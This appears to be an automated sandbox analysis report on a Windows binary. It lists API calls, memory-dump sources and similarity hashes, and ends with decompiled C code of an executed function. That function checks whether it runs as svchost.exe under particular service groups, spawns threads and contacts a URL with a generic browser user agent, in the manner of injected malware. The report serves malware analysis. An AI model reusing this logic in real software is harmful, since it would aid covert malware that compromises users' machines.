• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: fc1199bd8b7576b79735118972852dd1a7e8ba42b3ca2b0218e849eb7ba95f41
• Instruction ID: 65ec82024f0050d62c5aa18a9d59af1631c7c5e859e50fdde1c6790020d80a24
• Opcode Fuzzy Hash: fc1199bd8b7576b79735118972852dd1a7e8ba42b3ca2b0218e849eb7ba95f41
• Instruction Fuzzy Hash: FBF081B36006046F4745EE9DA881D9B77ECEE89364310015FF908D7302EA39DD51477E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AA5C), ref: 0060F9EA
• RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AA5C), ref: 0060F9F3
• RemoveFontResourceW.GDI32(00000000), ref: 0060FA00
• SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0060FA14
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
• String ID:
• API String ID: 261542597-0
• Opcode ID: 4d4d293d1f9dbc20c21e2411ca59a7708ade3ad13bf949b9de564e238f8cc3c4
• Instruction ID: dfbc53e8f1cdd66ec9ebb9bd66f4992ca480b4c62771c623e92dda120a3c2ed9
• Opcode Fuzzy Hash: 4d4d293d1f9dbc20c21e2411ca59a7708ade3ad13bf949b9de564e238f8cc3c4
• Instruction Fuzzy Hash: 98F0C87278430177D630B7B65C4BFAF128D4FC5744F60493DB604EB3C2D668D84142A9
Uniqueness
Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                                    • GetPropW.USER32 ref: 0050E99A
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: Process$AtomCurrentFindGlobalPropThreadWindow
• String ID:
• API String ID: 2582817389-0
• Opcode ID: d2063d6d394e8f62765d83b803eda28d99256e3f1fe5fb1cd52194ae8a2630a5
• Instruction ID: e102eef170da63bf505a6d713c1113ee4801a35bc19e545ba3a982a5f04e7684
• Opcode Fuzzy Hash: d2063d6d394e8f62765d83b803eda28d99256e3f1fe5fb1cd52194ae8a2630a5
• Instruction Fuzzy Hash: B3F0ECA160511167CF60BBB65C8787F5A8C9FC43D03351D2BF945DB182D924CC8142FE
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000008), ref: 006A4799
• OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A479F
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A47C1
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A47D2
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: 38c3b4d84d633f22a86344a5930ac08e8241369be101714da38fb162c330e58f
• Instruction ID: 10da8f8c74a3241f5e02fb80210d1ec53806dfcf86ee80de0044891c11e458d6
• Opcode Fuzzy Hash: 38c3b4d84d633f22a86344a5930ac08e8241369be101714da38fb162c330e58f
• Instruction Fuzzy Hash: 2AF0A0706043003BD300EAB58C82E9B37DCAF85711F00482DBA98C7280DA78ED489762
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 004F5549
• SelectObject.GDI32(00000000,058A00B4), ref: 004F555B
• GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F5566
• ReleaseDC.USER32 ref: 004F5577
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MetricsObjectReleaseSelectText
• String ID:
• API String ID: 2013942131-0
• Opcode ID: 14fbe85bcd4cf3be47bb432825b68447d7e4ed233deadf784685ce309785678e
• Instruction ID: 658a988d36d71ce3bab16ef7ee104d6016508106ebe8fbf8f6d71eaa57139fcf
• Opcode Fuzzy Hash: 14fbe85bcd4cf3be47bb432825b68447d7e4ed233deadf784685ce309785678e
• Instruction Fuzzy Hash: 43E04871E169A433D61161662C42BEB25498F423A9F08111BFF44992D5DA0DCD4042FD
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 0060ED34
• GetLastError.KERNEL32(00000000,0060ED7C,?,?,?,00000001), ref: 0060ED43
  • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <
• API String ID: 893404051-4251816714
• Opcode ID: 480ba7d80929159cff1dc9196e4ab957db805e1bfd706933b8e8c71d327d0e34
• Instruction ID: e241974b84c1913d27331e1b8670269cd021abd25e4475656a32ed52160d5831
• Opcode Fuzzy Hash: 480ba7d80929159cff1dc9196e4ab957db805e1bfd706933b8e8c71d327d0e34
• Instruction Fuzzy Hash: 76216B70A40219DFDB14EFA9C886ADE7BF9EF49344F50043AF804A72D1E7759A418B98
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B5BBE
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: a8f49e2eab2cae1c106e4680518f681a956298d62e733e87d233503d72d3a859
• Instruction ID: a54ba8f7f6fb51cac07e83dc6930cd9f58dc65c08491e71cf19d1336e0aa8d26
• Opcode Fuzzy Hash: a8f49e2eab2cae1c106e4680518f681a956298d62e733e87d233503d72d3a859
• Instruction Fuzzy Hash: F921C070A047098FCB00EBA4E891BFEBBF6EB89314F50447AE505D7291EB74A9448B54
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessW.KERNEL32 ref: 006B5319
• CloseHandle.KERNEL32(006B53C4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B5380,?,006B5370,00000000), ref: 006B5336
  • Part of subcall function 006B5200: GetLastError.KERNEL32(00000000,006B529D,?,?,?), ref: 006B5223
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: D
• API String ID: 3798668922-2746444292
• Opcode ID: bd8a923999b9991710b115b99d01daf65809e1e9577aad379d7a6708e8adf6d8
• Instruction ID: 4eb0c59f4803b7506f5ff6830a9c1deb5937146a7a7730e05c7aa181d319c706
• Opcode Fuzzy Hash: bd8a923999b9991710b115b99d01daf65809e1e9577aad379d7a6708e8adf6d8
• Instruction Fuzzy Hash: 1C1182B1604608AFD704EBA5DC92FEE77EDEF08304F91007AF605E7281E6745E448758
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(>YC), ref: 00435610
  • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AllocInitStringVariant
• String ID: >YC$cYC
• API String ID: 4010818693-2962211312
• Opcode ID: 95145bfc45b7620ee9ddcdd8df841c505c76c4f986ac1c97678f8ad24fa23931
• Instruction ID: 5a220649ebee1d9f27268bcd1ac9fa6249c44259e217bc11eddfa162a287c46a
• Opcode Fuzzy Hash: 95145bfc45b7620ee9ddcdd8df841c505c76c4f986ac1c97678f8ad24fa23931
• Instruction Fuzzy Hash: A8F08170700604AFD700EB95CD42E9EB7FCEB8D700FA04576F204E3291DA346E048669
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 006AB828: FreeLibrary.KERNEL32(00000000,006B7594,00000000,006B75A3,?,?,?,?,?,006B8087), ref: 006AB83E
  • Part of subcall function 006AB518: GetTickCount.KERNEL32 ref: 006AB560
  • Part of subcall function 00614EC0: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 00614EDF
• GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B8087), ref: 006B75BD
• TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B8087), ref: 006B75C3
Strings
• Detected restart. Removing temporary directory., xrefs: 006B7577
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
• String ID: Detected restart. Removing temporary directory.
• API String ID: 1717587489-3199836293
• Opcode ID: 9d8c6a5e71bce1eaabc020f983e6a3b3e943ad5cbfd447bc04c93601dbcaea22
• Instruction ID: eb50edc141b176b4c4c2d30214ac255ec0ff1137937d64bc1826d6109f125fe4
• Opcode Fuzzy Hash: 9d8c6a5e71bce1eaabc020f983e6a3b3e943ad5cbfd447bc04c93601dbcaea22
• Instruction Fuzzy Hash: FAE02BF260C6042ED3613BB5BC02DE67F9FEBC7364751043AF40482902CD1968C18778
Uniqueness
Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 005C759C: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C751A,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5), ref: 005C75AA
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5,?,00000000,006B69A2), ref: 005C7524
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: efebfd98173b0eafe801dbdb02c234ba5fe6efea653fc4811e05af60f83a25fa
                                                                                    • Instruction ID: 7e2c108bb10f7f082d0db0eee0b4291c943f7f38440bc59f5173c01314d4ac5e
                                                                                    • Opcode Fuzzy Hash: efebfd98173b0eafe801dbdb02c234ba5fe6efea653fc4811e05af60f83a25fa
                                                                                    • Instruction Fuzzy Hash: 68E0C2B23482152FC20172FF2C85F6F4E8CEDCD75A310043EF605E2502E958CD0209AC
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060CFD8,00000000,0060D0AA,?,?,006D479C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C621E
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: 62b8e0f0a56936aa9a12e08c2800317b2c896f52e35f249fadc7c93598274ed8
                                                                                    • Instruction ID: c75d70e110fee00d4030cd3977e0a9c06a7ab18f3cb046c04c9789280543d232
                                                                                    • Opcode Fuzzy Hash: 62b8e0f0a56936aa9a12e08c2800317b2c896f52e35f249fadc7c93598274ed8
                                                                                    • Instruction Fuzzy Hash: 09E086B874070116DB2072FA5CC3F9B1A8B6BC4714F10443E7B54D62C6EDADDA8442DA
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C74B6,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C73D7
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: a04977c9df1766bfa9eb39965416b1cc808de74be9259f562920b096e4c3932b
                                                                                    • Instruction ID: c2b8af028828c778303b028511c4b48d7ee3342a6cedbc73199b4139695af62d
                                                                                    • Opcode Fuzzy Hash: a04977c9df1766bfa9eb39965416b1cc808de74be9259f562920b096e4c3932b
                                                                                    • Instruction Fuzzy Hash: C4E092B0619204DFDB05AB64EC85F853FD5E78D305F11281EF14092991CBB508D0CB54
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C751A,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5), ref: 005C75AA
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: 8390f49b65f4fec2f209d5efc8905e974ae146cd1b5ec0c6a84ab675bf547ecf
                                                                                    • Instruction ID: 4e3f113fda4c16e881a5f3aa9ecd558cba9a4971931a60422d60a81ddc808e35
                                                                                    • Opcode Fuzzy Hash: 8390f49b65f4fec2f209d5efc8905e974ae146cd1b5ec0c6a84ab675bf547ecf
                                                                                    • Instruction Fuzzy Hash: D7D0C7B23167171F551171FA3CD1FDB0E8C5A5D399314047AF600D2941D655CD4119A8
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C36AE,00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006B80C6
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: 5cbe801bf7b381ca0378d38539efb860e368aea908294e06d9e36ba0bca127a5
                                                                                    • Instruction ID: b900b06cde22f286b5d6b80c7bf5c94766530aebccc61ebef0275fd01e3919ca
                                                                                    • Opcode Fuzzy Hash: 5cbe801bf7b381ca0378d38539efb860e368aea908294e06d9e36ba0bca127a5
                                                                                    • Instruction Fuzzy Hash: 50B092E02C130218182072B72C03ACA040F0994B8A70104553B10A3481DD5880C98339
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECC0A0(void* __ebx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				long _v532;
                                                                                    				signed int _t15;
                                                                                    				int _t23;
                                                                                    				signed int _t24;
                                                                                    				void* _t26;
                                                                                    				void* _t28;
                                                                                    				signed int _t38;
                                                                                    				signed int _t41;
                                                                                    				signed int _t42;
                                                                                    				void* _t75;
                                                                                    				signed int _t77;
                                                                                    				WCHAR* _t80;
                                                                                    				void* _t82;
                                                                                    				signed int _t83;
                                                                                    				void* _t84;
                                                                                    				signed int _t86;
                                                                                    
                                                                                    				_t15 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t15 ^ _t86;
                                                                                    				_t80 = GetCommandLineW();
                                                                                    				GetModuleFileNameW(0,  &_v528, 0x104);
                                                                                    				_t23 = lstrcmpiW(E04EDD5EE( &_v528, 0x5c) + 2, L"svchost.exe"); // executed
                                                                                    				if(_t23 != 0) {
                                                                                    					_t24 = E04ECA980();
                                                                                    					__eflags = _t24;
                                                                                    					if(_t24 != 0) {
                                                                                    						E04ECBE90(__ebx, _t80, __edi, _t80); // executed
                                                                                    					} else {
                                                                                    						_t82 = CreateThread(0, 0, E04ECB280, 0, 0,  &_v532);
                                                                                    						WaitForSingleObject(_t82, 0xffffffff);
                                                                                    						CloseHandle(_t82);
                                                                                    					}
                                                                                    					_t26 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // executed
                                                                                    					_t75 = _t26;
                                                                                    					__eflags = _t75;
                                                                                    					if(_t75 == 0) {
                                                                                    						goto L19;
                                                                                    					} else {
                                                                                    						_t28 = InternetOpenUrlW(_t75, 0x4f055fc, 0, 0, 0x80000000, 0);
                                                                                    						__eflags = _t28;
                                                                                    						if(_t28 != 0) {
                                                                                    							InternetCloseHandle(_t28);
                                                                                    							InternetCloseHandle(_t75);
                                                                                    							goto L19;
                                                                                    						} else {
                                                                                    							InternetCloseHandle(_t75);
                                                                                    							__eflags = _v8 ^ _t86;
                                                                                    							return E04ED572E(_v8 ^ _t86);
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					if(StrStrIW(_t80, L"netsvcs") == 0) {
                                                                                    						_t38 = StrStrIW(_t80, L"SystemNetworkService");
                                                                                    						__eflags = _t38;
                                                                                    						if(_t38 == 0) {
                                                                                    							__eflags = StrStrIW(_t80, L"AppService");
                                                                                    							if(__eflags == 0) {
                                                                                    								L19:
                                                                                    								__eflags = _v8 ^ _t86;
                                                                                    								return E04ED572E(_v8 ^ _t86);
                                                                                    							} else {
                                                                                    								_v532 = 0;
                                                                                    								_t77 = E04EC95F0(__ebx,  &_v532, StrStrIW, _t80, __eflags);
                                                                                    								__eflags = _t77;
                                                                                    								if(_t77 == 0) {
                                                                                    									goto L19;
                                                                                    								} else {
                                                                                    									_t83 = _v532;
                                                                                    									__eflags = _t83;
                                                                                    									if(_t83 == 0) {
                                                                                    										goto L19;
                                                                                    									} else {
                                                                                    										_t41 = E04ECB9A0(__ebx, _t77, _t83, _t77, _t83);
                                                                                    										__eflags = _t41;
                                                                                    										if(_t41 > 0) {
                                                                                    											goto L19;
                                                                                    										} else {
                                                                                    											_push(__ebx);
                                                                                    											do {
                                                                                    												Sleep(0x3e8);
                                                                                    												_t42 = E04ECB9A0(Sleep, _t77, _t83, _t77, _t83);
                                                                                    												__eflags = _t42;
                                                                                    											} while (_t42 <= 0);
                                                                                    											__eflags = _v8 ^ _t86;
                                                                                    											return E04ED572E(_v8 ^ _t86);
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t84 = CreateThread(0, 0, E04ECB280, 0, 0,  &_v532);
                                                                                    							WaitForSingleObject(_t84, 0xffffffff);
                                                                                    							CloseHandle(_t84);
                                                                                    							__eflags = _v8 ^ _t86;
                                                                                    							return E04ED572E(_v8 ^ _t86);
                                                                                    						}
                                                                                    					} else {
                                                                                    						CloseHandle(CreateThread(0, 0, E04ECA8C0, 0, 0, 0));
                                                                                    						CloseHandle(CreateThread(0, 0, E04EC9DC0, 0, 0,  &_v532));
                                                                                    						return E04ED572E(_v8 ^ _t86);
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetCommandLineW.KERNEL32(00000001,00000000), ref: 04ECC0B5
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04ECC0CB
                                                                                    • lstrcmpiW.KERNEL32(-00000002,svchost.exe), ref: 04ECC0EB
                                                                                    • StrStrIW.SHLWAPI(00000000,netsvcs), ref: 04ECC105
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECA8C0,00000000,00000000,00000000), ref: 04ECC120
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC129
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EC9DC0,00000000,00000000,?), ref: 04ECC13F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC142
                                                                                    • StrStrIW.SHLWAPI(00000000,SystemNetworkService), ref: 04ECC15A
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECB280,00000000,00000000,?), ref: 04ECC174
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECC17F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC186
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECB280,00000000,00000000,?), ref: 04ECC233
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECC23E
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC245
                                                                                    • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 04ECC261
                                                                                    • InternetOpenUrlW.WININET(00000000,04F055FC,00000000,00000000,80000000,00000000), ref: 04ECC27E
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04ECC289
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateThread$Internet$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                                                    • String ID: AppService$Mozilla/4.0 (compatible)$SystemNetworkService$netsvcs$svchost.exe
                                                                                    • API String ID: 2591637205-553284339
                                                                                    • Opcode ID: a6f9bc82d9bbb387fb87d8ebf049f3e642d4f20b2fb01ddc504f8ffd2808dc32
